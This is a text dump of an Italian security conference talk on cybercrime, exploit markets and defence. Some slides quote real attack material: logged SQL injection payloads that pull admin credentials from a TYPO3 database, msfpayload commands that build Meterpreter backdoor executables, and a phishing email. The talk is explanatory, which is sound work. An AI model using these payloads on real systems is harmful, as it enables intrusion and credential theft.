Attacchi, bugie e underground digitale by Andrea Pompili

1,216 views
1,127 views

Published on

Possibile che, dopo anni di leaks indiscriminati, conti correnti svuotati e attacchi persistenti di tutte le forme e colori, non sia cambiato nulla?
Possibile che, nonostante le OWASP Top 10 citate fino alla nausea e le grida disperate degli espertoni di sicurezza, certe abitudini rimangano così dure a morire?
Tra verità e leggende, cercheremo di capire cosa realmente conta per il povero attaccante e cosa, purtroppo, offre il mondo di un’information technology perennemente abbagliata dal mito della scatola magica.

Published in: Technology, Self Improvement
0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total views
1,216
On SlideShare
0
From Embeds
0
Number of Embeds
39
Actions
Shares
0
Downloads
8
Comments
0
Likes
0
Embeds 0
No embeds

No notes for slide

Attacchi, bugie e underground digitale by Andrea Pompili

  1. 1. Page  ‹N›Except where otherwise noted, this work is licensed underhttp://creativecommons.org/licenses/by-nc-sa/3.0/Andrea Pompiliapompili@hotmail.com – Xilogic Corp.ROMA 20-23.03.2013www.codemotionworld.comATTACCHI, BUGIE EUNDERGROUND DIGITALESpeaker: Andrea PompiliThere are only 10 typesof people in the world:Those who understand binary,and those who dont
  2. 2. Page  ‹N›Except where otherwise noted, this work is licensed underhttp://creativecommons.org/licenses/by-nc-sa/3.0/Andrea Pompiliapompili@hotmail.com – Xilogic Corp.ROMA 20-23.03.2013www.codemotionworld.com
  3. 3. Page  ‹N›Except where otherwise noted, this work is licensed underhttp://creativecommons.org/licenses/by-nc-sa/3.0/Andrea Pompiliapompili@hotmail.com – Xilogic Corp.ROMA 20-23.03.2013www.codemotionworld.com«»> Bonifica e Hardening fatta a tappeto un anno prima> Sistemi Operativi Patched all’ultima versione disponibile> Logging integrale di tutte le attività del Sito> 2 Sistemi IPS (Intrusion Prevention System) in cascata
  4. 4. Page  ‹N›Except where otherwise noted, this work is licensed underhttp://creativecommons.org/licenses/by-nc-sa/3.0/Andrea Pompiliapompili@hotmail.com – Xilogic Corp.ROMA 20-23.03.2013www.codemotionworld.comOutside70%Inside - Accidental12%Inside - Malicious9%Inside5%Unknown4%Source: http://datalossdb.org/ Statistiche 2012
  5. 5. Page  ‹N›Except where otherwise noted, this work is licensed underhttp://creativecommons.org/licenses/by-nc-sa/3.0/Andrea Pompiliapompili@hotmail.com – Xilogic Corp.ROMA 20-23.03.2013www.codemotionworld.com7,20%6,20%6,10%5,70%6,80%6,80%29,90%41,20%27,20%34,10%34,10%30,70%62,90%52,60%66,70%60,20%59,10%62,50%Attacchi complessivi rilevati dal 2007Source: OAI (Osservatorio sugli Attacchi Informatici in Italia) “Rapporto OAI 2012”
  6. 6. Page  ‹N›Except where otherwise noted, this work is licensed underhttp://creativecommons.org/licenses/by-nc-sa/3.0/Andrea Pompiliapompili@hotmail.com – Xilogic Corp.ROMA 20-23.03.2013www.codemotionworld.com76,00%3,80%16,80%3,40%76,00%6,50%13,70%3,80%76,40%6,70%13,70%3,20%Impatto degli Attacchi rilevatiSource: OAI (Osservatorio sugli Attacchi Informatici in Italia) “Rapporto OAI 2012”
  7. 7. Page  ‹N›Except where otherwise noted, this work is licensed underhttp://creativecommons.org/licenses/by-nc-sa/3.0/Andrea Pompiliapompili@hotmail.com – Xilogic Corp.ROMA 20-23.03.2013www.codemotionworld.com«Non è obiettivo di questo “focus” riportare in dettaglio irisultati della rilevazione ma analizzando i dati relativi ai valorimedi per l’intero campione si può ritenere che i risultati siano:• soddisfacenti per la protezione logica;• molto soddisfacenti per la sicurezza dell’infrastruttura;• sufficienti per la sicurezza dei servizi;• da migliorare per la sicurezza dell’organizzazione.«Possiamo dire che ce l’aspettavamo»
  8. 8. Page  ‹N›Except where otherwise noted, this work is licensed underhttp://creativecommons.org/licenses/by-nc-sa/3.0/Andrea Pompiliapompili@hotmail.com – Xilogic Corp.ROMA 20-23.03.2013www.codemotionworld.com
  9. 9. Page  ‹N›Except where otherwise noted, this work is licensed underhttp://creativecommons.org/licenses/by-nc-sa/3.0/Andrea Pompiliapompili@hotmail.com – Xilogic Corp.ROMA 20-23.03.2013www.codemotionworld.com
  10. 10. Page  ‹N›Except where otherwise noted, this work is licensed underhttp://creativecommons.org/licenses/by-nc-sa/3.0/Andrea Pompiliapompili@hotmail.com – Xilogic Corp.ROMA 20-23.03.2013www.codemotionworld.com
  11. 11. Page  ‹N›Except where otherwise noted, this work is licensed underhttp://creativecommons.org/licenses/by-nc-sa/3.0/Andrea Pompiliapompili@hotmail.com – Xilogic Corp.ROMA 20-23.03.2013www.codemotionworld.comAki Mon TelecomShane AtkinsonCanter & SiegelEddie DavidsonPeter Francis-MacraeDavis Wolfgang HawkeJumpstart TechnologiesVandar KushnirKevin LipnitzWayne MansfieldOleg NikolaenkoAlan RalskyDave RhodesScott RichterRussian Business NetworkiFrame CashSBT Telecom NetworkDefcon HostMicronnet Ltd.InstallsCashSendar ArgicRichard Colbert Source: Panda Security «The Cyber-crime Black Market: Uncovered> - 2011RBNet
  12. 12. Page  ‹N›Except where otherwise noted, this work is licensed underhttp://creativecommons.org/licenses/by-nc-sa/3.0/Andrea Pompiliapompili@hotmail.com – Xilogic Corp.ROMA 20-23.03.2013www.codemotionworld.comhttp://www.forbes.com/sites/andygreenberg/2012/03/23/shopping-for-zero-days-an-price-list-for-hackers-secret-software-exploits/
  13. 13. Page  ‹N›Except where otherwise noted, this work is licensed underhttp://creativecommons.org/licenses/by-nc-sa/3.0/Andrea Pompiliapompili@hotmail.com – Xilogic Corp.ROMA 20-23.03.2013www.codemotionworld.com
  14. 14. Page  ‹N›Except where otherwise noted, this work is licensed underhttp://creativecommons.org/licenses/by-nc-sa/3.0/Andrea Pompiliapompili@hotmail.com – Xilogic Corp.ROMA 20-23.03.2013www.codemotionworld.com(*) According to Frank RiegerChief technology officer at GSMK
  15. 15. Page  ‹N›Except where otherwise noted, this work is licensed underhttp://creativecommons.org/licenses/by-nc-sa/3.0/Andrea Pompiliapompili@hotmail.com – Xilogic Corp.ROMA 20-23.03.2013www.codemotionworld.comSource: Vincenzo Iozzo – OWASP Day 2012
  16. 16. Page  ‹N›Except where otherwise noted, this work is licensed underhttp://creativecommons.org/licenses/by-nc-sa/3.0/Andrea Pompiliapompili@hotmail.com – Xilogic Corp.ROMA 20-23.03.2013www.codemotionworld.comSource: Vincenzo Iozzo – OWASP Day 2012
  17. 17. Page  ‹N›Except where otherwise noted, this work is licensed underhttp://creativecommons.org/licenses/by-nc-sa/3.0/Andrea Pompiliapompili@hotmail.com – Xilogic Corp.ROMA 20-23.03.2013www.codemotionworld.comSo, how does one get full remote code execution in Chrome? In the case ofPinkie Pie’s exploit, it took a chain of Six Different Bugs in order tosuccessfully break out of the Chrome sandbox.(http://blog.chromium.org/2012/05/tale-of-two-pwnies-part-1.html)Last year (2011), VUPEN released a video to demonstrate asuccessful sandbox escape against Chrome but Google challengedthe validity of that hack, claiming it exploited third-party code,believed to be the Adobe Flash plugin.(http://www.zdnet.com/blog/security/pwn2own-2012-google-chrome-browser-sandbox-first-to-fall/10588)
  18. 18. Page  ‹N›Except where otherwise noted, this work is licensed underhttp://creativecommons.org/licenses/by-nc-sa/3.0/Andrea Pompiliapompili@hotmail.com – Xilogic Corp.ROMA 20-23.03.2013www.codemotionworld.comBlackole Exploit KitCool Exploit Kit
  19. 19. Page  ‹N›Except where otherwise noted, this work is licensed underhttp://creativecommons.org/licenses/by-nc-sa/3.0/Andrea Pompiliapompili@hotmail.com – Xilogic Corp.ROMA 20-23.03.2013www.codemotionworld.comhttp://trailofbits.files.wordpress.com/2011/08/attacker-math.pdf
  20. 20. Page  ‹N›Except where otherwise noted, this work is licensed underhttp://creativecommons.org/licenses/by-nc-sa/3.0/Andrea Pompiliapompili@hotmail.com – Xilogic Corp.ROMA 20-23.03.2013www.codemotionworld.com
  21. 21. Page  ‹N›Except where otherwise noted, this work is licensed underhttp://creativecommons.org/licenses/by-nc-sa/3.0/Andrea Pompiliapompili@hotmail.com – Xilogic Corp.ROMA 20-23.03.2013www.codemotionworld.com
  22. 22. Page  ‹N›Except where otherwise noted, this work is licensed underhttp://creativecommons.org/licenses/by-nc-sa/3.0/Andrea Pompiliapompili@hotmail.com – Xilogic Corp.ROMA 20-23.03.2013www.codemotionworld.com
  23. 23. Page  ‹N›Except where otherwise noted, this work is licensed underhttp://creativecommons.org/licenses/by-nc-sa/3.0/Andrea Pompiliapompili@hotmail.com – Xilogic Corp.ROMA 20-23.03.2013www.codemotionworld.comDa: hdesk@rcs.itInviato: Thursday, November 04, 2004 7:48 PMA: xxxxxx@rcs.itOggetto: Aggiornamento configurazioneSalve,riceve questa mail in quanto sono stati rilevati dei problemi con il suo account di posta elettronica. La causa ditali problemi e riscontrabile in una non corretta configurazione del Suo computer che La preghiamo diaggiornare collegandosi al seguente indirizzo:http://xxxx.rcs.it/software/av/index.htmlLa preghiamo di eseguire lo script, Configurazione.vbe, di autoconfigurazione il cui link e disponibile nellapagina indicata. Al termine della configurazione Le apparira un messaggio di conferma dellesito positivodellaggiornamento.Distinti SalutiHelp Desk - Supporto Tecnico RCSRCS Editori S.p.A. - Settore Quotidiani
  24. 24. Page  ‹N›Except where otherwise noted, this work is licensed underhttp://creativecommons.org/licenses/by-nc-sa/3.0/Andrea Pompiliapompili@hotmail.com – Xilogic Corp.ROMA 20-23.03.2013www.codemotionworld.com
  25. 25. Page  ‹N›Except where otherwise noted, this work is licensed underhttp://creativecommons.org/licenses/by-nc-sa/3.0/Andrea Pompiliapompili@hotmail.com – Xilogic Corp.ROMA 20-23.03.2013www.codemotionworld.com
  26. 26. Page  ‹N›Except where otherwise noted, this work is licensed underhttp://creativecommons.org/licenses/by-nc-sa/3.0/Andrea Pompiliapompili@hotmail.com – Xilogic Corp.ROMA 20-23.03.2013www.codemotionworld.com
  27. 27. Page  ‹N›Except where otherwise noted, this work is licensed underhttp://creativecommons.org/licenses/by-nc-sa/3.0/Andrea Pompiliapompili@hotmail.com – Xilogic Corp.ROMA 20-23.03.2013www.codemotionworld.com173.254.216.69 - - [13/Nov/2012:20:03:35 +0100]"GET /index.php?id=2501&tx_wfqbe_pi1[uid]=1+order+by+1000+--+ HTTP/1.0"178.32.211.140 - - [13/Nov/2012:20:03:43 +0100]"GET /index.php?id=2501&tx_wfqbe_pi1[uid]=1+and(/*!select*/+1+/*!from*/ (/*!select*/+count(*),concat_ws(0x3a,substring((concat_ws(0x3b,user(),version(),database(),repeat(0x00,100))),1,64),floor(rand(0)*2))x+/*!from*/+/*!information_schema*/.tables+group+by+x)a)+--+”
  28. 28. Page  ‹N›Except where otherwise noted, this work is licensed underhttp://creativecommons.org/licenses/by-nc-sa/3.0/Andrea Pompiliapompili@hotmail.com – Xilogic Corp.ROMA 20-23.03.2013www.codemotionworld.com89.253.105.39 - - [15/Nov/2012:12:32:14 +0100]"GET /some_path/some_file.html?tx_wfqbe_pi1[uid]=11502+and(select+1+from(select+count(*),concat_ws(0x3a,substring((SELECT+binary(concat(concat_ws(0x3a,username,password,admin),repeat(0x00,100)))+FROM+be_users+WHERE+admin=1+LIMIT+1,1),1,64),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--+""Opera/9.80 (Windows NT 6.1) Presto/2.12.388 Version/12.10"Web Shell Extension
  29. 29. Page  ‹N›Except where otherwise noted, this work is licensed underhttp://creativecommons.org/licenses/by-nc-sa/3.0/Andrea Pompiliapompili@hotmail.com – Xilogic Corp.ROMA 20-23.03.2013www.codemotionworld.comhttp://evader.stonesoft.com/http://insecure.org/stf/secnet_ids/secnet_ids.html
  30. 30. Page  ‹N›Except where otherwise noted, this work is licensed underhttp://creativecommons.org/licenses/by-nc-sa/3.0/Andrea Pompiliapompili@hotmail.com – Xilogic Corp.ROMA 20-23.03.2013www.codemotionworld.com
  31. 31. Page  ‹N›Except where otherwise noted, this work is licensed underhttp://creativecommons.org/licenses/by-nc-sa/3.0/Andrea Pompiliapompili@hotmail.com – Xilogic Corp.ROMA 20-23.03.2013www.codemotionworld.commsfpayload windows/meterpreter/bind_tcp X >moca_x86_tcp_4444.exe
  32. 32. Page  ‹N›Except where otherwise noted, this work is licensed underhttp://creativecommons.org/licenses/by-nc-sa/3.0/Andrea Pompiliapompili@hotmail.com – Xilogic Corp.ROMA 20-23.03.2013www.codemotionworld.commsfpayload windows/x64/meterpreter/bind_tcp X >moca_x64_tcp_4444.exe
  33. 33. Page  ‹N›Except where otherwise noted, this work is licensed underhttp://creativecommons.org/licenses/by-nc-sa/3.0/Andrea Pompiliapompili@hotmail.com – Xilogic Corp.ROMA 20-23.03.2013www.codemotionworld.com“The truth is, consumer-grade antivirus products can’tprotect against targeted malware created by well-resourced nation-states with bulging budgets.They can protect you against run-of-the-mill malware:banking trojans, keystroke loggers and e-mail worms.But targeted attacks like these go to great lengths toavoid antivirus products on purpose”
  34. 34. Page  ‹N›Except where otherwise noted, this work is licensed underhttp://creativecommons.org/licenses/by-nc-sa/3.0/Andrea Pompiliapompili@hotmail.com – Xilogic Corp.ROMA 20-23.03.2013www.codemotionworld.com<#1> Ragiona come un Attaccante in modo da comprenderecosa faranno e come ti attaccheranno<#2> Cerca di capire i loro obiettivi, la capacità che hanno, masoprattutto i vincoli operativi che hanno<#3> Identifica il valore «percepito» di ciò che vuoidifendere, ma soprattutto cosa vuoi difendere<#4> Lavora su tutto il perimetro di difesa, senza atti di fede<#5> Se la tua difesa è più economica dell’attacco,tu sarai sempre in vantaggio
  35. 35. Page  ‹N›Except where otherwise noted, this work is licensed underhttp://creativecommons.org/licenses/by-nc-sa/3.0/Andrea Pompiliapompili@hotmail.com – Xilogic Corp.ROMA 20-23.03.2013www.codemotionworld.com
  36. 36. Page  ‹N›Except where otherwise noted, this work is licensed underhttp://creativecommons.org/licenses/by-nc-sa/3.0/Andrea Pompiliapompili@hotmail.com – Xilogic Corp.ROMA 20-23.03.2013www.codemotionworld.comDomande?Italian‫ة‬َّ‫ي‬َ‫أ‬ ‫ِب‬‫ل‬‫ا‬َ‫ط‬َ‫م‬Arabic¿Preguntas?SpanishQuestions?EnglishtupoQghachmeyKlingonSindarinJapaneseΕρωτήσεις?Greekвопросы?Russian

×